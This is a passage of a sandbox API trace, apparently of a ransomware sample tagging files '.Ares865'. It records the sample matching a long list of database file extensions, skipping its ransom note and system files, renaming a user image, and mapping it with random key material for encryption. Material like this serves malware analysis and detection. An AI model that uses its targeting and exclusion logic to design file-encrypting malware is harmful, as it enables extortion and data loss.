(lpString1="jpg", lpString2="db3") returned 1 [0063.666] lstrlenW (lpString="dbf") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.666] lstrlenW (lpString="mdf") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.666] lstrlenW (lpString="mdb") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.666] lstrlenW (lpString="sql") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.666] lstrlenW (lpString="sqlite") returned 6 [0063.666] lstrcmpiW (lpString1="ue.jpg", lpString2="sqlite") returned 1 [0063.666] lstrlenW (lpString="sqlite3") returned 7 [0063.666] lstrcmpiW (lpString1="lue.jpg", lpString2="sqlite3") returned -1 [0063.666] lstrlenW (lpString="sqlitedb") returned 8 [0063.666] lstrcmpiW (lpString1="Blue.jpg", lpString2="sqlitedb") returned -1 [0063.666] lstrlenW (lpString="xml") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.666] lstrlenW (lpString="$er") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.666] lstrlenW (lpString="4dd") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.666] lstrlenW (lpString="4dl") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.666] lstrlenW (lpString="^^^") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.666] lstrlenW (lpString="abs") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.666] lstrlenW (lpString="abx") returned 3 [0063.666] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.666] lstrlenW (lpString="accdb") returned 5 [0063.666] lstrcmpiW (lpString1="e.jpg", lpString2="accdb") returned 1 [0063.666] lstrlenW (lpString="accdc") returned 5 [0063.666] lstrcmpiW (lpString1="e.jpg", lpString2="accdc") returned 1 [0063.666] lstrlenW (lpString="accde") returned 5 [0063.666] lstrcmpiW (lpString1="e.jpg", lpString2="accde") returned 1 [0063.666] lstrlenW (lpString="accdr") returned 5 [0063.666] lstrcmpiW (lpString1="e.jpg", lpString2="accdr") returned 1 [0063.667] lstrlenW (lpString="accdt") returned 5 [0063.667] lstrcmpiW (lpString1="e.jpg", lpString2="accdt") returned 1 [0063.667] lstrlenW (lpString="accdw") returned 5 [0063.667] lstrcmpiW (lpString1="e.jpg", lpString2="accdw") returned 1 [0063.667] lstrlenW (lpString="accft") returned 5 [0063.667] lstrcmpiW (lpString1="e.jpg", lpString2="accft") returned 1 [0063.667] lstrlenW (lpString="adb") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.667] lstrlenW (lpString="adb") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.667] lstrlenW (lpString="ade") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.667] lstrlenW (lpString="adf") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.667] lstrlenW (lpString="adn") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.667] lstrlenW (lpString="adp") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.667] lstrlenW (lpString="alf") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.667] lstrlenW (lpString="ask") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.667] lstrlenW (lpString="btr") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.667] lstrlenW (lpString="cat") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.667] lstrlenW (lpString="cdb") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.667] lstrlenW (lpString="ckp") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.667] lstrlenW (lpString="cma") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.667] lstrlenW (lpString="cpd") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.667] lstrlenW (lpString="dacpac") returned 6 [0063.667] lstrcmpiW (lpString1="ue.jpg", lpString2="dacpac") returned 1 [0063.667] lstrlenW (lpString="dad") returned 3 [0063.667] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.668] lstrlenW (lpString="dadiagrams") returned 10 [0063.668] lstrcmpiW (lpString1="OfBlue.jpg", lpString2="dadiagrams") returned 1 [0063.668] lstrlenW (lpString="daschema") returned 8 [0063.668] lstrcmpiW (lpString1="Blue.jpg", lpString2="daschema") returned -1 [0063.668] lstrlenW (lpString="db-journal") returned 10 [0063.668] lstrcmpiW (lpString1="OfBlue.jpg", lpString2="db-journal") returned 1 [0063.668] lstrlenW (lpString="db-shm") returned 6 [0063.668] lstrcmpiW (lpString1="ue.jpg", lpString2="db-shm") returned 1 [0063.668] lstrlenW (lpString="db-wal") returned 6 [0063.668] lstrcmpiW (lpString1="ue.jpg", lpString2="db-wal") returned 1 [0063.668] lstrlenW (lpString="dbc") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.668] lstrlenW (lpString="dbs") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.668] lstrlenW (lpString="dbt") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.668] lstrlenW (lpString="dbv") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.668] lstrlenW (lpString="dbx") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.668] lstrlenW (lpString="dcb") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.668] lstrlenW (lpString="dct") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.668] lstrlenW (lpString="dcx") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.668] lstrlenW (lpString="ddl") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.668] lstrlenW (lpString="dlis") returned 4 [0063.668] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.668] lstrlenW (lpString="dp1") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.668] lstrlenW (lpString="dqy") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.668] lstrlenW (lpString="dsk") returned 3 [0063.668] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.668] lstrlenW (lpString="dsn") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.669] lstrlenW (lpString="dtsx") returned 4 [0063.669] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.669] lstrlenW (lpString="dxl") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.669] lstrlenW (lpString="eco") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.669] lstrlenW (lpString="ecx") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.669] lstrlenW (lpString="edb") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.669] lstrlenW (lpString="epim") returned 4 [0063.669] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.669] lstrlenW (lpString="fcd") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.669] lstrlenW (lpString="fdb") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.669] lstrlenW (lpString="fic") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.669] lstrlenW (lpString="flexolibrary") returned 12 [0063.669] lstrcmpiW (lpString1="esOfBlue.jpg", lpString2="flexolibrary") returned -1 [0063.669] lstrlenW (lpString="fm5") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.669] lstrlenW (lpString="fmp") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.669] lstrlenW (lpString="fmp12") returned 5 [0063.669] lstrcmpiW (lpString1="e.jpg", lpString2="fmp12") returned -1 [0063.669] lstrlenW (lpString="fmpsl") returned 5 [0063.669] lstrcmpiW (lpString1="e.jpg", lpString2="fmpsl") returned -1 [0063.669] lstrlenW (lpString="fol") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.669] lstrlenW (lpString="fp3") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.669] lstrlenW (lpString="fp4") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.669] lstrlenW (lpString="fp5") returned 3 [0063.669] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.669] lstrlenW (lpString="fp7") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.670] lstrlenW (lpString="fpt") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.670] lstrlenW (lpString="frm") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.670] lstrlenW (lpString="gdb") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.670] lstrlenW (lpString="gdb") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.670] lstrlenW (lpString="grdb") returned 4 [0063.670] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.670] lstrlenW (lpString="gwi") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.670] lstrlenW (lpString="hdb") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.670] lstrlenW (lpString="his") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.670] lstrlenW (lpString="ib") returned 2 [0063.670] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.670] lstrlenW (lpString="idb") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.670] lstrlenW (lpString="ihx") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.670] lstrlenW (lpString="itdb") returned 4 [0063.670] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.670] lstrlenW (lpString="itw") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.670] lstrlenW (lpString="jet") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.670] lstrlenW (lpString="jtx") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.670] lstrlenW (lpString="kdb") returned 3 [0063.670] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.670] lstrlenW (lpString="kexi") returned 4 [0063.670] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.670] lstrlenW (lpString="kexic") returned 5 [0063.670] lstrcmpiW (lpString1="e.jpg", lpString2="kexic") returned -1 [0063.670] lstrlenW (lpString="kexis") returned 5 [0063.671] lstrcmpiW (lpString1="e.jpg", lpString2="kexis") returned -1 [0063.671] lstrlenW (lpString="lgc") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.671] lstrlenW (lpString="lwx") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.671] lstrlenW (lpString="maf") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.671] lstrlenW (lpString="maq") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.671] lstrlenW (lpString="mar") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.671] lstrlenW (lpString="marshal") returned 7 [0063.671] lstrcmpiW (lpString1="lue.jpg", lpString2="marshal") returned -1 [0063.671] lstrlenW (lpString="mas") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.671] lstrlenW (lpString="mav") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.671] lstrlenW (lpString="maw") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.671] lstrlenW (lpString="mdbhtml") returned 7 [0063.671] lstrcmpiW (lpString1="lue.jpg", lpString2="mdbhtml") returned -1 [0063.671] lstrlenW (lpString="mdn") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.671] lstrlenW (lpString="mdt") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.671] lstrlenW (lpString="mfd") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.671] lstrlenW (lpString="mpd") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.671] lstrlenW (lpString="mrg") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.671] lstrlenW (lpString="mud") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.671] lstrlenW (lpString="mwb") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.671] lstrlenW (lpString="myd") returned 3 [0063.671] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.672] lstrlenW (lpString="ndf") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.672] lstrlenW (lpString="nnt") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.672] lstrlenW (lpString="nrmlib") returned 6 [0063.672] lstrcmpiW (lpString1="ue.jpg", lpString2="nrmlib") returned 1 [0063.672] lstrlenW (lpString="ns2") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.672] lstrlenW (lpString="ns3") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.672] lstrlenW (lpString="ns4") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.672] lstrlenW (lpString="nsf") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.672] lstrlenW (lpString="nv") returned 2 [0063.672] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.672] lstrlenW (lpString="nv2") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.672] lstrlenW (lpString="nwdb") returned 4 [0063.672] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.672] lstrlenW (lpString="nyf") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.672] lstrlenW (lpString="odb") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.672] lstrlenW (lpString="odb") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.672] lstrlenW (lpString="oqy") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.672] lstrlenW (lpString="ora") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.672] lstrlenW (lpString="orx") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.672] lstrlenW (lpString="owc") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.672] lstrlenW (lpString="p96") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.672] lstrlenW (lpString="p97") returned 3 [0063.672] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.673] lstrlenW (lpString="pan") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.673] lstrlenW (lpString="pdb") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.673] lstrlenW (lpString="pdm") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.673] lstrlenW (lpString="pnz") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.673] lstrlenW (lpString="qry") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.673] lstrlenW (lpString="qvd") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.673] lstrlenW (lpString="rbf") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.673] lstrlenW (lpString="rctd") returned 4 [0063.673] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.673] lstrlenW (lpString="rod") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.673] lstrlenW (lpString="rodx") returned 4 [0063.673] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.673] lstrlenW (lpString="rpd") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.673] lstrlenW (lpString="rsd") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.673] lstrlenW (lpString="sas7bdat") returned 8 [0063.673] lstrcmpiW (lpString1="Blue.jpg", lpString2="sas7bdat") returned -1 [0063.673] lstrlenW (lpString="sbf") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.673] lstrlenW (lpString="scx") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.673] lstrlenW (lpString="sdb") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.673] lstrlenW (lpString="sdc") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.673] lstrlenW (lpString="sdf") returned 3 [0063.673] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.673] lstrlenW (lpString="sis") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.674] lstrlenW (lpString="spq") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.674] lstrlenW (lpString="te") returned 2 [0063.674] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.674] lstrlenW (lpString="teacher") returned 7 [0063.674] lstrcmpiW (lpString1="lue.jpg", lpString2="teacher") returned -1 [0063.674] lstrlenW (lpString="tmd") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.674] lstrlenW (lpString="tps") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.674] lstrlenW (lpString="trc") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.674] lstrlenW (lpString="trc") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.674] lstrlenW (lpString="trm") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.674] lstrlenW (lpString="udb") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.674] lstrlenW (lpString="udl") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.674] lstrlenW (lpString="usr") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.674] lstrlenW (lpString="v12") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.674] lstrlenW (lpString="vis") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.674] lstrlenW (lpString="vpd") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.674] lstrlenW (lpString="vvv") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.674] lstrlenW (lpString="wdb") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.674] lstrlenW (lpString="wmdb") returned 4 [0063.674] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.674] lstrlenW (lpString="wrk") returned 3 [0063.674] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.675] lstrlenW (lpString="xdb") returned 3 [0063.675] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.675] lstrlenW (lpString="xld") returned 3 [0063.675] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.675] lstrlenW (lpString="xmlff") returned 5 [0063.675] lstrcmpiW (lpString1="e.jpg", lpString2="xmlff") returned -1 [0063.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865") returned 95 [0063.675] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.ares865"), dwFlags=0x1) returned 1 [0063.676] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.676] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4734) returned 1 [0063.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.676] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.677] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.677] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.677] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1580, lpName=0x0) returned 0x164 [0063.681] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1580) returned 0x190000 [0063.682] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.682] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.682] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.683] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.683] CloseHandle (hObject=0x164) returned 1 [0063.683] CloseHandle (hObject=0x154) returned 1 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.683] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6477260, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce1a220d, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="SOFTBL~1.HTM")) returned 1 [0063.683] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.683] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="aoldtz.exe") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="..") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="windows") returned -1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="bootmgr") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="temp") returned -1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="pagefile.sys") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="boot") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="ids.txt") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="ntuser.dat") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="perflogs") returned 1 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="MSBuild") returned 1 [0063.684] lstrlenW (lpString="Soft Blue.htm") returned 13 [0063.684] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 87 [0063.684] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Soft Blue.htm" | out: lpString1="Soft Blue.htm") returned="Soft Blue.htm" [0063.684] lstrlenW (lpString="Soft Blue.htm") returned 13 [0063.684] lstrlenW (lpString="Ares865") returned 7 [0063.684] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0063.684] lstrlenW (lpString=".dll") returned 4 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".dll") returned 1 [0063.684] lstrlenW (lpString=".lnk") returned 4 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".lnk") returned 1 [0063.684] lstrlenW (lpString=".ini") returned 4 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".ini") returned 1 [0063.684] lstrlenW (lpString=".sys") returned 4 [0063.684] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".sys") returned 1 [0063.684] lstrlenW (lpString="Soft Blue.htm") returned 13 [0063.684] lstrlenW (lpString="bak") returned 3 [0063.684] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.684] lstrlenW (lpString="ba_") returned 3 